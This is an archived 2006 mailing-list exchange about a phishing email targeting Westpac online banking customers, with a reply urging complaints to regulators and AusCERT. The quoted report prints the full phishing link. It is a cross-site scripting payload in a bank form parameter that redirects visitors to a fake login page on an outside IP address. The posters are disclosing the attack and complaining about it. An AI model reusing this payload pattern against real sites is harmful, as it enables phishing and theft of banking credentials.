[LINK] Phishing plumbs new depths for Westpac Customers: XSS

Roger Clarke Roger.Clarke at xamax.com.au
Tue Nov 21 12:18:44 AEDT 2006 

Rick, please send this in the form of a complaint to:
-   the Privacy Commissioner
-   the ABA
-   AGIMO
-   AusCERT

Sure, they'll all fall over backwards flick-passing it to one 
another.  But there's a lot of nervousness in the Internet Banking 
security arena at present, and your good, solid detail could really 
hit the spot.

Make sure they understand that there are *two* incident reports in one:
-   the new form of phish
-   the completely inadequate incident reporting mechanism

You could also draw attention to the complaints-handling standards:
AS 4269:1995
ISO 10002:2004

At grave risk of telling you how to suck eggs:
http://www.privacy.org.au/Resources/Complaints.html


At 11:02 +1100 21/11/06, Rick Welykochy wrote:
>Just ran across this attempt at phishing for my Westpac username and password:
>(snipped from the phishing email)
>
>
>   Westpac Banking
>
>   No additional action is required by you to continue to
>   use your online services.
>
>   To review the changes [to Terms and Conditions], click on the link below:
>
>and here is the link:
>
>   https://www.westpac.com.au/forms/AskWestpac.nsf/
>   f_askWestpac?OpenForm&refTitle=<script>document.location=
>   'http://203.144.80.87/manual/.modonline/new.html'</script>
>
>I broke up the link into 3 parts for readability. The link does actually
>look valid, it takes you to the Westpac secure web site, but then the
>XSS (cross-site scripting) redirects you to a fake login page at
>http://203.144.80.87/manual/.modonline/new.html.
>
>Try http://tinyurl.com/tksrx if you wish to see it in action.
>
>I'm afraid this one might catch all but the technically savvy amongst us.
>
>Westpac has been contacted about this. Unfortunately, their website 
>has web-based
>forms only for email and no interface is provided to alert their IT staff to
>the existence of such a hoax as the one above. I had to submit the email and
>further details via a pitifully inadequate web form. I have my doubts as to
>how far into the system my alert will survive. And I note with some 
>annoyance that
>the link for actual feedback does not work (never returns a page) so I had to
>use a far less appropriate page.
>
>The page that would not respond to my browser is here:
>http://www.westpac.com.au/Forms/single_page_forms.nsf/f_customerServiceFeedbackServiceProblem
>Can other Linkers actaully see this page? I cannot, neither with Firefox
>or with Safari.
>
>
>
>cheers
>rickw
>
>
>
>
>--
>_________________________________
>Rick Welykochy || Praxis Services
>
>Welcome to the department of redundancy department.
>
>_______________________________________________
>Link mailing list
>Link at mailman.anu.edu.au
>http://mailman.anu.edu.au/mailman/listinfo/link

-- 
Roger Clarke                  http://www.anu.edu.au/people/Roger.Clarke/

Xamax Consultancy Pty Ltd      78 Sidaway St, Chapman ACT 2611 AUSTRALIA
                    Tel: +61 2 6288 1472, and 6288 6916
mailto:Roger.Clarke at xamax.com.au                http://www.xamax.com.au/

Visiting Professor in Info Science & Eng  Australian National University
Visiting Professor in the eCommerce Program      University of Hong Kong
Visiting Professor in the Cyberspace Law & Policy Centre      Uni of NSW

More information about the Link mailing list